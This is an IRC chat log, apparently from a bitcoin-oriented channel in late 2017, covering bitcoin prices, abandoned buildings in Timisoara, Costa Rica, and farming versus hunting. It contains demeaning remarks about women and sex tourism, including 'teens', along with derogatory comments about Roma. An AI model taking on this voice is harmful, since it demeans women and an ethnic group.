intrinsically chumpatronic. 1743425;1511817035;asciilifeform;three modest warheads, together weighing less than a toyota, and usd worth ~0 in short order, regardless of by what backed. 1743426;1511817055;asciilifeform;or if one insists : 1 sha256 collision on tx set, and btc similarly. 1743427;1511817062;mircea_popescu;asciilifeform huh didn't consider that. 1743428;1511817079;asciilifeform;( see http://btcbase.org/log/2017-09-01#1709540 and possibly elsewhere ) 1743429;1511817079;a111;Logged on 2017-09-01 23:26 asciilifeform: we already established that a hash collision is asteroid event for blockchain. 1743430;1511817091;mircea_popescu;i meant re the "don't inhale" part. 1743431;1511817097;asciilifeform;oh yea 1743432;1511817098;mircea_popescu;you can't light a cigar without "inhaling", goes right into it 1743433;1511817109;asciilifeform;hence the observation. 1743434;1511817115;mircea_popescu;aww pity. 1743435;1511817128;asciilifeform;light a detcord or sumthing else useful and pyrotechnic. 1743436;1511817145;mircea_popescu;whole point is to light something useless by burning something useless. 1743437;1511817160;asciilifeform;then light the pyre with captured nsa stoolie or whoever is first candidate... 1743438;1511817161;mircea_popescu;if useful pyrotechnics, i'd burn say voltaire. 1743439;1511817468;*;asciilifeform bbl,teatime 1743440;1511817492;mircea_popescu;meanwhile in old whore passing the whore torch to young whore, http://78.media.tumblr.com/bf711257d2423930babcd74671debfb9/tumblr_mi0oaslL301r2cjkwo1_500.gif 1743441;1511821373;BingoBoingo;In other news, network switch has arrived, does fit in luggage 1743442;1511821845;mircea_popescu;dun dun dun] 1743443;1511822806;BingoBoingo;Checked bag to be clear, not carryon able 1743444;1511824022;mod6;<+diana_coman> http://btcbase.org/log/2017-11-27#1743378 <- yay; I'll read! << ditto 1743445;1511824022;a111;Logged on 2017-11-27 20:35 asciilifeform: mircea_popescu: i've cut ffa into 30 pieces, each ~1 pg; -> bl0g article. 1743446;1511824052;asciilifeform;BingoBoingo: meanwhile i bought ssds. 1743447;1511824374;asciilifeform;in other not really noose, http://btcbase.org/log/2017-11-26#1743205 sparked pretty lively ( if inconclusive ) comment thread. 1743448;1511824374;a111;Logged on 2017-11-26 23:55 deedbot: http://www.loper-os.org/?p=1927 << Loper OS - The Peculiarly Quiet Decline and Fall of the KVM 1743449;1511824609;mircea_popescu;asciilifeform seems to boil down to approx discussion here. 1743450;1511825558;asciilifeform;( amusingly, there is an nsa version : https://ipgard.com/product-category/secureswitch ) 1743451;1511825878;asciilifeform;in other older olds, asciilifeform finally dug up http://trilema.com/2011/poveste-trista-cu-ciobanesc-german -- because literally same thing happened to him in timis ! even same ~type~ of dog 1743452;1511825947;mircea_popescu;jesus 1743453;1511825950;mircea_popescu;those fucking idiots. 1743454;1511825956;mircea_popescu;should have to get a license to own dogs. 1743455;1511825974;asciilifeform;german shepherd. and followed me around town, for hour+ 1743456;1511825989;asciilifeform;and stopped to poke head into yards, 'hey maybe they need a dog' 1743457;1511826002;mircea_popescu;didja buy it a bacon "? 1743458;1511826011;asciilifeform;proper, tall beast, with proper pointy ears 1743459;1511826038;asciilifeform;nope, it switched to another d00d before asciilifeform got to where they have eats 1743460;1511826047;mircea_popescu;them's da breaks. 1743461;1511826052;asciilifeform;this was in the north-eastern part of town, with the old water tower 1743462;1511826068;asciilifeform;( what's the story of that thing, i did wonder, it was grandiose and entirely abandoned by all appearances ) 1743463;1511826091;mircea_popescu;i dunno. 1743464;1511826402;asciilifeform;http://www.loper-os.org/pub/timis_tower_1.jpg + http://www.loper-os.org/pub/timis_tower_2.jpg << subj ( and it dun fit in 1 frame, even ) 1743465;1511826453;asciilifeform;'steampunk' monument. 1743466;1511826492;*;asciilifeform wondered what it would cost to buy. 1743467;1511826575;mircea_popescu;eh, the locals are retarded. there's a building right downtown, huge, ancient, derelict, standing there for decade+. 1743468;1511826581;mircea_popescu;not sold because... they're poor and stupid, basically. 1743469;1511826633;asciilifeform;whaddayamean 'a building', i saw 100s 1743470;1511826689;asciilifeform;there was 1 even right by the hotel, the very next door. roof fell off ( i wondered how, there were what, hurricanes ? strong enuff to rip off steel roof ? ) and squad of metallists worked on cutting it to pieces, and carting away, whole time i was there 1743471;1511826786;mircea_popescu;rain. 1743472;1511826795;asciilifeform;lolwat 1743473;1511826821;asciilifeform;rain twisted 20 tonnes of steel roof so that i could see the underside ? 1743474;1511826888;BingoBoingo;Many of these in Middle West along towns that were formerly rail transit hubs, architecturally grandoise for setting, but neglected and then fall 1743475;1511827156;ben_vulpes;asciilifeform: that water tower is epic 1743476;1511827210;mircea_popescu;asciilifeform if you fail to maintain a steel structure for long enough, it will rust in weak spots and bend under own weight. 1743477;1511827228;asciilifeform;oughta be inwards tho 1743478;1511827230;asciilifeform;rather than out 1743479;1511827231;mircea_popescu;no tornado needed. 1743480;1511827238;mircea_popescu;this is always a disputable point. 1743481;1511827251;asciilifeform;i can picture how it might, tho 1743482;1511827251;mircea_popescu;which is why the whole "that's not how towers fall" experts are so laughable. bitch... 1743483;1511827275;mircea_popescu;if we could say how shit fails we'd be way ahead in the game. problem with failing shit is that it fails as it wants to fail. 1743484;1511827282;mircea_popescu;when it fails as you want it to fail it's called "working". 1743485;1511827372;asciilifeform;other typical items : http://www.loper-os.org/pub/timis_sad_mansion.jpg http://www.loper-os.org/pub/timis_sad_mansion_2.jpg http://www.loper-os.org/pub/timis_sad_factory.jpg 1743486;1511827395;asciilifeform;( that last previously in thread http://btcbase.org/log/2017-10-25#1728629 ) 1743487;1511827395;a111;Logged on 2017-10-25 16:55 asciilifeform: mircea_popescu: 45°45'39.1"N 21°15'25.0"E 1743488;1511827603;asciilifeform;incidentally an item like 'sad mansion 2' is quite unthinkable in usa : it STILL HAS GLASS !! 1743489;1511827685;mircea_popescu;ah, those are gypsy mansions 1743490;1511827692;mircea_popescu;the guys start building them, then the money runs out. 1743491;1511827703;mircea_popescu;very persian empire cca 917 ad lifestyle. 1743492;1511827705;asciilifeform;#2 i immediately suspected 1743493;1511827709;asciilifeform;but how about the first 1743494;1511827713;asciilifeform;it definitely looked pre-commie 1743495;1511827714;mircea_popescu;yup. 1743496;1511827721;mircea_popescu;nah. was built 2005ish. 1743497;1511827727;asciilifeform;with brick arches?! 1743498;1511827728;mircea_popescu;and they're all inhabited, the herd lives in the basement usually. 1743499;1511827747;mircea_popescu;if you look, the brick is just cut to a concrete arch. faux. 1743500;1511827752;asciilifeform;Uzinele Mecanice Timișoara was definitely inhabited. 1743501;1511827761;asciilifeform;hm interesting. 1743502;1511827945;asciilifeform;http://www.romania-actualitati.ro/files/timisoara-1989-tata-noi-suntem-copii-ce-sa-ne-faca-noua-18342909.jpg << related lulz 1743503;1511828354;asciilifeform;gotta wonder if the derps suspected that it would turn into http://www.loper-os.org/pub/timis_sad_umt1.jpg http://www.loper-os.org/pub/timis_sad_umt2.jpg 1743504;1511828377;asciilifeform;bonus archaeology : http://www.loper-os.org/pub/timis_sad_umt_b00kz_1.jpg http://www.loper-os.org/pub/timis_sad_umt_b00kz_2.jpg 1743505;1511828469;asciilifeform;the interesting bit is that the corp nominally still exists : http://www.umt.ro , makes bmw gearboxes or what was it, in some back corner of the massive campus full of ???. 1743506;1511828517;asciilifeform;but linked because there were quite definitely ~somebody~ living in there. ( did not look like what i expect of bums, however. looked like people, of sorts. ) 1743507;1511828663;deedbot;http://trilema.com/2017/mafioso/ << Trilema - Mafioso 1743508;1511833666;asciilifeform;http://btcbase.org/log/2017-11-28#1743505 >> err, eggog, http://www.umt.ro/Acasa.html 1743509;1511833666;a111;Logged on 2017-11-28 00:21 asciilifeform: the interesting bit is that the corp nominally still exists : http://www.umt.ro , makes bmw gearboxes or what was it, in some back corner of the massive campus full of ???. 1743510;1511840315;mircea_popescu;aaand in other news, bitcoin getting close to 10k means that the http://trilema.com/2014/ill-pay-for-your-tits/ offer stands at just about $200 worth for a half hour's work if that. nevertheless, something to the tune of four billion females the world over perceive, entirely hallucinatorily, that they have the option to eschew this. 1743511;1511840338;mircea_popescu;not to mention the hordes of "digital artists" who hallucinate the ridoinculous notion that they have the option to not work for minigame. 1743512;1511840370;mircea_popescu;all these idiots will be whining -- plenty of them are already whining -- about "unfairness" and "wealth distribution". the part where it's the just desserts for their own mendacity conveniently omitted. 1743513;1511840392;mircea_popescu;somehow if the usg website comes up with "it's illegal to smoke", they stop smoking, AS FUCKING IF. whereas when the republic orders, they "have options". 1743514;1511840451;mircea_popescu;somehow nobody manages to feel even vaguely responsible for all the gains they DIDN'T realize ; much like that famous anon whore, "let me tell you what i want in exchange for what i'm willing to do" cuz it's like poorocracy over here or something now. 1743515;1511840778;trinque;relatedly, after last weeekend's work, I can actually write up how said anontits can receive their btc via deedbot. had to make it such that deedbot can pass over a new acct, but reliance on deedbot ends there for key to wallet mapping. 1743516;1511840858;trinque;in the absence of gossipd, using ssh with $user<->$specificCommand between nodes 1743517;1511841055;mircea_popescu;aha! 1743518;1511841714;asciilifeform;http://btcbase.org/log/2017-11-28#1743510 << betcha mircea_popescu would conclusively barf long before a thousand, much less 4b, were to show up, with their inevitable and loathesome moan 'unfair! virii stole me coinz', 'my gox stole!' and similar leprosies 1743519;1511841714;a111;Logged on 2017-11-28 03:38 mircea_popescu: aaand in other news, bitcoin getting close to 10k means that the http://trilema.com/2014/ill-pay-for-your-tits/ offer stands at just about $200 worth for a half hour's work if that. nevertheless, something to the tune of four billion females the world over perceive, entirely hallucinatorily, that they have the option to eschew this. 1743520;1511841856;asciilifeform;turne out, even most supposedly-literate folx dun have what it takes to properly operate own btctron. 1743521;1511841981;asciilifeform;( i for instance have some approximate notion of how many people have an actual rng. the number is not large. ) 1743522;1511842468;asciilifeform;http://btcbase.org/log/2017-11-28#1743514 << the 4 possible types of people : a) those who had nfi wtf btc is and still have nfi b) those who bought btc by the trainload at <= 5bux c) who did not, and have no hallucinated defense mechanism in their head d) who did not, and have one 1743523;1511842468;a111;Logged on 2017-11-28 03:40 mircea_popescu: somehow nobody manages to feel even vaguely responsible for all the gains they DIDN'T realize ; much like that famous anon whore, "let me tell you what i want in exchange for what i'm willing to do" cuz it's like poorocracy over here or something now. 1743524;1511842558;asciilifeform;members of group 'c' presumably have already eaten their pistols. whereas members of groups 'a' and 'b' aren't particularly talkative. ergo the most regularly met with type, is 'd'. 1743525;1511842738;mircea_popescu;asciilifeform i really wouldn't gas. 1743526;1511842768;asciilifeform;http://btcbase.org/log/2017-11-28#1743512 << gotta wonder what those phrases are plebespeak code for, in actuality. 'i dun have the things the tv people have' ? 1743527;1511842768;a111;Logged on 2017-11-28 03:39 mircea_popescu: all these idiots will be whining -- plenty of them are already whining -- about "unfairness" and "wealth distribution". the part where it's the just desserts for their own mendacity conveniently omitted. 1743528;1511842779;mircea_popescu;evidently. 1743529;1511842796;mircea_popescu;do you know there is not.one.single.shop selling pure natural fiber shirts in all of costa rica ? 1743530;1511842832;mircea_popescu;i'm like "silk" dude recognizes the word, it's like i went to fish shop in 1980. "oh, THAT is what we don't have here!!! i know what it is! it's the thing this shop doesn'thave!" 1743531;1511842847;asciilifeform;unsurprising , turd world (incl usa) all walks in those same chinese synthetic shirts 1743532;1511842856;mircea_popescu;linen ? "linen can't be used for textiles because it frays" "your mom also frays. how about cotton ?" 1743533;1511842869;mircea_popescu;"o, sure, we got that!" dood comes back, 65% polyester, 35% cotton. 1743534;1511842874;mircea_popescu;this... is... polyester! 1743535;1511842893;mircea_popescu;oh. well pure cotton can't be used for clothing!!! bitch... this shirt on me, see it ? this is 100% cotton! 1743536;1511842921;mircea_popescu;asciilifeform you don't understand how http://btcbase.org/log/2017-11-23#1742437 works. 1743537;1511842921;a111;Logged on 2017-11-23 15:20 diana_coman: ahahaha "like mircea popescu or whatever his name is, but even with him i suspect he's not anywhere near as rich as he wants people to think he is - it doesn't add up; poorly fitted suits, average looking hotel suites/condos, spends all his time living in cheap shitholes which is precisely what white people who have money to live abroad but aren't rich do)" ; from ^^ 1743538;1511842940;mircea_popescu;they have BRAND NAME cheap polyester chinese shirts. thereby... VEHEMENT OPULENCE. 1743539;1511842948;asciilifeform;aha same as in usa 1743540;1511842964;asciilifeform;i suspect cr is in the event horizon of the unspeakable beast. 1743541;1511842992;mircea_popescu;sort-of the sicily of rome. by 2500 they'll still have the most period-accurate pantsuit worn on the streets 1743542;1511842997;asciilifeform;from mircea_popescu's tales, it has roughly similar absent-fishes-at-the-fishmonger. 1743543;1511843004;mircea_popescu;much like sicilian dialect to this day puts the verb in last place, "siciliano sono" 1743544;1511843191;asciilifeform;recall the cr food thread ? the very presence of the usa expats, i suspect makes various nice things scarce 1743545;1511843226;mircea_popescu;us expats are to the last man poor fucks. their impact is ~0, you should see how happy 60yo is to have the attention of 19yo nicaraguan 1743546;1511843231;asciilifeform;they won't buy sprats, or cotton shirts, why would apeman give a shit re of what is the shirt 1743547;1511843242;mircea_popescu;no, the problem is the unhappy meeting of a deeply rural population with the chinese empire. 1743548;1511843249;asciilifeform;apparently collectively >0 ? 1743549;1511843256;mircea_popescu;i doubt it. 1743550;1511843287;mircea_popescu;most of the cr tourism receipts are euros brought by zee germans, followed by euros brought by the azns (who, weirdly, tend to use euros more than dollars). 1743551;1511843314;asciilifeform;tourists dun typically buy groceries afaik 1743552;1511843316;mircea_popescu;cr regularily has a major euro excedent and dollar deficit (as it imports cars and shit from mexico for usd) 1743553;1511843346;mircea_popescu;asciilifeform "expats" are generally dorks come here a week-two at a time for the hookers. 1743554;1511843361;mircea_popescu;generally, retired old men on measly budgets. 1743555;1511843377;asciilifeform;hm i pictured 'brass pole in bangkok' old fart perma-exiles 1743556;1511843390;mircea_popescu;not generally. 1743557;1511843402;asciilifeform;interesting 1743558;1511843428;mircea_popescu;of the people who genuinely live here and bear us passports, the majority is the us embassy residentura. 1743559;1511843429;asciilifeform;so take that casino d00d -- rly, he's going back north ? why would he do that..? 1743560;1511843434;mircea_popescu;ie a coupla dozen dorks. 1743561;1511843450;mircea_popescu;asciilifeform cuz it's expensive to be here ? 1743562;1511843463;asciilifeform;i thought whole point for him, was the cheap ? 1743563;1511843471;mircea_popescu;the cheap ~whores~. 1743564;1511843518;mircea_popescu;girl here can be had for a hundy a night, and she'll be pliant. he can't get what he's looking for in the us, at any price ; nor can he really afford the 2-3k a night top shelf (ie, teens, tall, nice figure, good manners etc) 1743565;1511843521;asciilifeform;but other items, expensive ? what's a modest flat cost ? 1743566;1511843531;mircea_popescu;bout the same as in the us. 1743567;1511843546;mircea_popescu;not miami-us, but wisconsin-us. 1743568;1511843564;asciilifeform;so why wisconsin not empty of its pensioners yet 1743569;1511843584;mircea_popescu;same reason i don't have a 4 byte index of 4bn tits. 1743570;1511843640;asciilifeform;yea gotta be. same reason ro ain't filling up 1743571;1511843656;mircea_popescu;girls slightly more expensive there 1743572;1511843666;mircea_popescu;though not on a per foot basis. 1743573;1511843678;asciilifeform;save on square metrage; spend on gurlz 1743574;1511843689;mircea_popescu;per foot of height i meant. 1743575;1511843715;asciilifeform;lol bought like cable ? 1743576;1511843727;asciilifeform;'i'll take six meterz plox' 1743577;1511843737;mircea_popescu;well if your distance's 5"8 what can you do with a coupla 3"6s ? 1743578;1511843741;asciilifeform;0 1743579;1511843769;asciilifeform;but where outside of pygmystan are they 3"6 1743580;1511843775;mircea_popescu;here 1743581;1511843783;asciilifeform;nuts 1743582;1511843802;mircea_popescu;great tits, great asses, as tall as your dick altogether. 1743583;1511843857;asciilifeform;i get the impression that mircea_popescu ended up in more of a 'martian colony' position than he'd like -- stuck importing literally all of the necessities of life 1743584;1511843957;mircea_popescu;honestly, when it comes to females imports are always preferable. if you can make do with what the soil provides you should probably increase your standards. 1743585;1511843976;mircea_popescu;if you run a farm you can just lasso the local cowsies, but if you run a IC plant you prolly have to attract foreigners. 1743586;1511844021;mircea_popescu;meanwhile, the things that don't have to be imported (colonials : chocolate, coffee, fresh fruit of land and sea etc) are much preferable. whore suffers naught for a 10 hour trip in the plane ; tuna quite does. 1743587;1511844051;asciilifeform;i can picture. 1743588;1511844073;asciilifeform;usa is an astonishing pit, banana republic with 0 bananas 1743589;1511844086;mircea_popescu;whereas here can stop car on roadside 1743590;1511844088;asciilifeform;at least down south : bananas. 1743591;1511844089;mircea_popescu;and cut your own 1743592;1511844092;asciilifeform;aha. 1743593;1511845348;mircea_popescu;in other news, toto u curtu croaked last week. 1743594;1511845390;mircea_popescu;easily most accomplished troll of the 90s, gave the (mostly italian speaking) redditards hives. 1743595;1511845866;asciilifeform;can haz link to example ? 1743596;1511845873;mircea_popescu;example what ? 1743597;1511845875;*;asciilifeform never seen 1743598;1511845882;mircea_popescu;!~google falcone bombing 1743599;1511845883;jhvh1;mircea_popescu: Giovanni Falcone - Wikipedia: ; Capaci bombing - Wikipedia: ; Mafia's murder of Giovanni Falcone : Duty, danger and courage ...: 1743600;1511845908;asciilifeform;the troll ? 1743601;1511845931;mircea_popescu;!~google toto riina 1743602;1511845933;jhvh1;mircea_popescu: Salvatore Riina - Wikipedia: ; 'He killed all his rivals': Totò Riina , Sicilian mafia's 'boss of bosses ...: ; Toto Riina , Mafia 'boss of bosses', dies in jail aged 87 - BBC News: > https://archive.is/LHmQD 1743727;1511881384;a111;Logged on 2017-11-22 18:05 asciilifeform: in other noose, sci-hub.cc dun resolve nomoar. 1743728;1511881952;mircea_popescu;heh 1743729;1511881999;mircea_popescu;and STILL will not speak of how optional dns is. 1743730;1511882044;mircea_popescu;o look, it's in there, some "professor of publishing". 1743731;1511882623;asciilifeform;http://btcbase.org/log/2017-11-28#1743671 << lol, 'hi-fi tomatoes and cucumbers' ?! 1743732;1511882623;a111;Logged on 2017-11-28 13:19 mircea_popescu: http://adevarul.ro/assets/adevarul.ro/MRImage/2013/05/15/5193daf3053c7dd83f9f898d/646x404.jpg random ancient lolz 1743733;1511882654;mircea_popescu;aha. 1743734;1511882670;mircea_popescu;"pioneer the japanese corp is now growing tomatoes" 1743735;1511883570;asciilifeform;http://btcbase.org/log/2017-11-28#1743639 << ? >> http://btcbase.org/log/2014-06-02#699078 1743736;1511883570;a111;Logged on 2017-11-28 12:58 mircea_popescu: and speaking of which, http://btcbase.org/log/2017-11-28#1743518 prolly needs to be addressed better than the original "i wouldn't give a shit" : i'm ready to take over the governance of the entire world from the hands of the inept pretenders of today, as of yesterday. the result would be very ~different~, yes, but that's irrelevant. 1743737;1511883570;a111;Logged on 2014-06-02 18:30 mircea_popescu: Up until recently it was practically impossible to become embroiled into any sort of dealing with the subgroup, their ownership being strictly assumed and their lives strictly subsumed by the corporations competent at dealing with the human cattle : fastfood providers, supermarkets, the government. Both as employers and providers these specialised bureaucracies have the necessary tools, including cattle prods (or what 1743738;1511883594;asciilifeform;( wouljda really want to herd cattle all day, every day, mircea_popescu ? ) 1743739;1511883664;asciilifeform;http://btcbase.org/log/2017-11-28#1743653 << you'd be quite surprised at the variety of faux-olive oils in usa. errything from avocado to old tyres, i suspect 1743740;1511883664;a111;Logged on 2017-11-28 13:14 diana_coman: mircea_popescu, peasants of 1800 did not have the option of plastic or they'd have taken it just the same; that being said I still recall the communist-ro going precisely that route e.g. have now this here wonderful soya-oil just as good as the "true thing" which supposedly was... sunflower oil because nobody was supposed to even remember olive oil 1743741;1511883803;asciilifeform;http://btcbase.org/log/2017-11-28#1743673 << in ru , 'the glory of the ancien regime' types get the label 'хруст французской булки' 1743742;1511883803;a111;Logged on 2017-11-28 13:20 mircea_popescu: consider what the (immensely popular at the time) item says : "la tarani le-a luat pamintul, la studenti le-a luat cuvintul, la soferi le-a luat benzina, la prosti le facea cu mina". ie, the peasants HAD land. how ? when ? without the fucking communists the usg-alligned maniu, bratianu & friends would be STILL dithering over minor land distributions. exactly like the usgstan does. 1743743;1511883857;asciilifeform;( from a fantasy-nostalgia song that contained said line , 'Как упоительны в России вечера, Любовь, шампанское, закаты, переулки. Ах, лето красное, забавы и прогулки, Как упоительны в России вечера. Балы, красавицы, лакеи, юнкера, И вальсы Шуберта, и хруст французской б 1743744;1511883857;asciilifeform;улки ...' ) 1743745;1511883951;mircea_popescu;asciilifeform what do you think it is i do, all day every day ? 1743746;1511883992;asciilifeform;dunno, herd ocelots ? 1743747;1511884013;asciilifeform;or other selected, exotic beasts. but surely not cow. 1743748;1511884120;asciilifeform;re peasants -- dim-witted westerners of prev generation ( current ones have nfi and dun give half a shit even if you plug'em into the mains wiring ) thought that somehow communism happened because of malevolent martians landing, rather than from http://btcbase.org/log/2017-11-28#1743681 1743749;1511884120;a111;Logged on 2017-11-28 13:22 mircea_popescu: diana_coman yes, pre-communism romania had private land ownership, resulting in "tarani" as the genertal noun not having any land. 1743750;1511884128;mircea_popescu;and they come from what ? 1743751;1511884155;asciilifeform;i've nfi from what. from the wild. 1743752;1511884221;mircea_popescu;lol 1743753;1511884229;mircea_popescu;andf that "wild" is ? 1743754;1511884291;asciilifeform;the saeculum, presided over by various herdemoocracies etc ? 1743755;1511884310;mircea_popescu;so how do you secrete a wall between this and cows all day ? 1743756;1511884332;asciilifeform;well specifically i picture mircea_popescu as moar of a hunter than a farmer 1743757;1511884353;mircea_popescu;do you think these categories are distinguishable ? modern hunter === modern farmer. 1743758;1511884391;asciilifeform;hunter doesn't concern himself with every piece of fungus in the forest, he walks in and shoots the tastiest-looking thing he knows how to get a bead on, neh 1743759;1511884400;asciilifeform;farmer -- concerned with fungi. 1743760;1511884415;mircea_popescu;this is purely an artefact of interpretative ballet. 1743761;1511884425;asciilifeform;and stuck with the chore of running a faux ecosystem with own hands, feeding the defective piglets to the proper ones, etc 1743762;1511884432;asciilifeform;hm? 1743763;1511884441;mircea_popescu;hunter, concerns, inasmuch as he bothers to notice frog is frog does not shoot at frog ; farmer, doesn't concern, in asmuch as doesn't go out picking thistle. 1743764;1511884635;asciilifeform;hunter takes the forest as it is; farmer otoh is running a pretend-herdemoocracy-forest where calorie-dense seeds appear in rather unlikely densities ( as reviewed in http://trilema.com/2014/in-which-you-become-grain ) 1743765;1511884785;asciilifeform;farmer pushes the boulder uphill, and is stuck with 9000 types of 'naturam expellas furca tamen usque recurret' (tm)(r) chores. 1743766;1511884825;mircea_popescu;this is nonsense, but it also has exhausted my budget. 1743767;1511884950;asciilifeform;if mircea_popescu at some later point feels like showing how farmer and hunter are exactly same thing, i'll listen. 1743768;1511884991;asciilifeform;http://btcbase.org/log/2017-11-28#1743697 << i suspect... marx! has the pill here. entfremdung der arbeit (tm)(r) 1743769;1511884991;a111;Logged on 2017-11-28 13:28 mircea_popescu: i never quite understood why gardening is universally popular. 1743770;1511885053;asciilifeform;!#s while you sleep 1743771;1511885054;a111;37 results for "while you sleep", http://btcbase.org/log-search?q=while%20you%20sleep 1743772;1511885120;asciilifeform;quite a few folx, esp. the mentally limited, are irresistibly drawn to anything that smells of http://btcbase.org/log/2014-01-19#449500 1743773;1511885120;a111;Logged on 2014-01-19 19:48 mircea_popescu: i came to it studying the warrior forum (*) years ago, when i noticed the unifying factor in all their textual emissions was a desire to "make money while you sleep". 1743774;1511885531;asciilifeform;an incidentally interesting bit is that gardens are an 'unprincipled exception' in usgdom just as they were in su. theoretically a garden aficionado owes every 4th tomato or whatever his 'bracket' is, to usg, as tax; things that grow from the ground count, famously, as 'income' -- even if not sold -- per 'wickard v. filburn' 1743775;1511885657;asciilifeform;it may even already be the case that the cost of a ~proper~ (i.e. non-poisoned) vegetable in usgdom from the specialty shop, counting the multiple taxation (of yer own money, as 'income', of the sale, as state 'sales tax', of the growers', of the landlord's, etc ) layers, equals or exceeds the cost of growing it with own hands in a garden. 1743776;1511885693;asciilifeform;!#s wickard 1743777;1511885693;a111;8 results for "wickard", http://btcbase.org/log-search?q=wickard 1743778;1511885700;asciilifeform;^ apparently already visited. 1743779;1511885740;mircea_popescu;asciilifeform your notion is anachronistic, in the sense that it compares a "hunter" cut out of the 10k years ago subsistence hunter contained in the expression hunter-gatherer with the modern farmer. you can't cross time boundries like that. modern hunter is modern in exactly the same way modern farmer is modern, and for the same reasons. historical "farmer" is just as primitive as the hunter, which is why it's even called 1743780;1511885740;mircea_popescu;gatherer as opposed to farmer. 1743781;1511885779;asciilifeform;in the sense of him being a tentacle on a gigantic farming-powered civilization, that made his rifle, his shirt, his truck -- yea 1743782;1511885814;mircea_popescu;and in the sense that he has the choice to either put mangers in and fill them every winter or be forest walker ; and that he either obeys "hunting season" or idem ; and so on. 1743783;1511885831;asciilifeform;i didn't say that i saw mircea_popescu as ~modern~ hunter, lol 1743784;1511885848;asciilifeform;nah, proper one, in bear skin, with spear, etc. 1743785;1511885848;mircea_popescu;modernity is modernity, there's no out of it. once you walked around your cage, it's walked, there's no undoing it. 1743786;1511885867;mircea_popescu;this being the only proper definition of modernity : man after finally having walked the perimeter of his cage. 1743787;1511885878;mircea_popescu;"age of exploration" aite. 1743788;1511885896;asciilifeform;there's also such a thing as countermodernity tho 1743789;1511885900;asciilifeform;sawing through the cage. 1743790;1511885906;mircea_popescu;in the sense there's a thing as countericecream 1743791;1511885913;mircea_popescu;frozen yogurt stilll icecream. 1743792;1511885963;asciilifeform;the herdemoocracy narrative is that steam power made clitler inescapable. i dun buy. 1743793;1511885990;asciilifeform;( or alternatively if you prefer http://btcbase.org/log/2017-06-20#1672530 ) 1743794;1511885990;a111;Logged on 2017-06-20 17:19 asciilifeform: BingoBoingo: stalin, supposedly, once said to his friends, 'history divides into three eras, matriarchate, patriarchate, and secretariate' 1743795;1511886013;mircea_popescu;all "sawing through the cage" proposals i've seen to date (and a major part of what i do is look for exactly that) consist of either idle wankery (german philosophy school etc) or else "here's how to cut a two inch hole in the wall, stick a paper bag out of there, and duct tape it to the hole from outside". ty... but... this replaces a wall with a paper bag ? "yes, but it goes FURTHER OUT!!" sure, but i still know it like my 1743796;1511886013;mircea_popescu;own pocket ? "well of course... what did you expect ?" honestly, nothing much. 1743797;1511886081;mircea_popescu;there's no going back to a state of innocence, whereby "we don't know what's at the end of the earth". thereby, there's no going back to a state where we will ever do anything other than sift through herds looking for the accidentally lost woman in an inexplicable sheepskin. 1743798;1511886105;mircea_popescu;which reduces to, "most of your time, and most of your women's time, will be spent with cows." 1743799;1511886147;asciilifeform;i'll point out, for completeness, the traditional alternatives of: the bottle, and the library 1743800;1511886153;asciilifeform;0 cows in either 1743801;1511886155;mircea_popescu;wankery. 1743802;1511886160;asciilifeform;and wankery!11 1743803;1511886166;mircea_popescu;no. THOSE are wankery. 1743804;1511886189;asciilifeform;well if defining walking around with an unenclosed cock as necessarily wankery -- then yes 1743805;1511886222;mircea_popescu;wankery is the adolescentine state whereby the things we don't look at aren't there because the power of our imagination makes the playboy girl real! 1743806;1511886283;asciilifeform;[insert 'literacy is sin, as the reader sees things that ain't there' thread here] 1743807;1511886284;mircea_popescu;which incidentally provides the explanation for http://btcbase.org/log/2017-11-24#1742829 as plain as day. 1743808;1511886284;a111;Logged on 2017-11-24 05:34 mircea_popescu: one day i'll understand how this sense-nonsense alloying works. 1743809;1511886303;mircea_popescu;"lifetime wanker will have adapted to his lifestyle". oh... you don't say. 1743810;1511886493;asciilifeform;there might still be a few chukchas left somewhere who properly practice the virtue of 'never see a thing that ain't there' . the folx who shown a novel answer 'why' 1743811;1511886513;mircea_popescu;you'd be surprised what % of current "novels" fail this simple test. 1743812;1511886548;asciilifeform;this also. and the detritus eventually clogs the arteries of whatever culture produced it. 1743813;1511886562;mircea_popescu;anyway, the problem, as that wise doctor pointed out, isn't when you start hearing voices, but when you start talking back. 1743814;1511886581;mircea_popescu;it's one thing to see things thatr aren't there. for as long as you live in the world of things that are there. once you move to living in the unreal... 1743815;1511886585;asciilifeform;see possibly also the thread with faraday and his magnetic field lines. 1743816;1511886629;asciilifeform;'dreamer' culture is somewhat like a school of pilotage absent the landing. 1743817;1511886655;asciilifeform;( see also http://btcbase.org/log/2014-03-05#548254 ) 1743818;1511886655;a111;Logged on 2014-03-05 23:06 asciilifeform: the 'time microscope' thing is typical of aging inventors who, by virtue of being cut off from competent peers (either by having none alive, or being on the wrong side of a jail of one kind or another) 1743819;1511886831;asciilifeform;there's 2 possible uses of abstraction -- a) to move between places in reality phase space that aren't walkable to via greedy algorithm ( e.g. tractor is not a minor refinement on horse-drawn plow ) b) to pull own cock 1743820;1511886866;asciilifeform;when folx begin to see reality as 'read-only', they retreat into full-bore (b) . 1743821;1511886970;asciilifeform;i'll recount an episode recently reported by asciilifeform's pet, on reconnaissance into a heathen pit . two d00dz argued re 'post-rsa crypto'. and one drew forth from his sleeve an erudite wankery, n-th generation stolen from thel0gz! : 'why not cipher using playing field of cellular automaton, say, game of life, initial state as key...' 1743822;1511887082;asciilifeform;witness the traditional 'tlp' symptoms of walking around with no inclination to ~try~ such a thing, or anything at all, with own hands, and see why this dun work with any known automaton ruleset ( do i have to say why, or readers already know ? ) 1743823;1511887372;asciilifeform;( i'm rot13 the answ to riddle : gurer vf ab xabja jnl gb thnenagrr na vavgvny jbeyq fgngr gung qbrfa'g dhvpxyl pbairetr vagb n svkrq fgrnql fgngr, be n ernfbanoyl fubeg ybbc (juvpu tvirf gevivnyyl oernxnoyr pvcuregrkg) -- vg vf rknpgyl gur fnzr vgrz nf gur 'lrf vg'f na ac-pbzcyrgr ceboyrz, ohg ubj gb thnenagrr gung n enaqbzyl trarengrq vafgnapr vf abg gevivny?' ) 1743824;1511887404;asciilifeform;but it's a trivially discoverable fact, for people who actually bothered with the subj beyond chitchat. 1743825;1511887800;*;asciilifeform bbl,meat 1743826;1511891775;asciilifeform;!~ticker --market all 1743827;1511891782;jhvh1;asciilifeform: Bitstamp BTCUSD last: 9915.01, vol: 9889.25891721 | Bitfinex BTCUSD last: 9910.1, vol: 43921.30261443 | Kraken BTCUSD last: 9846.5, vol: 2382.27948271 | Volume-weighted last average: 9908.26779661 1743828;1511894503;mod6;hai 1743829;1511894507;asciilifeform;ohai mod6 1743830;1511894520;mod6;how goes ascii? 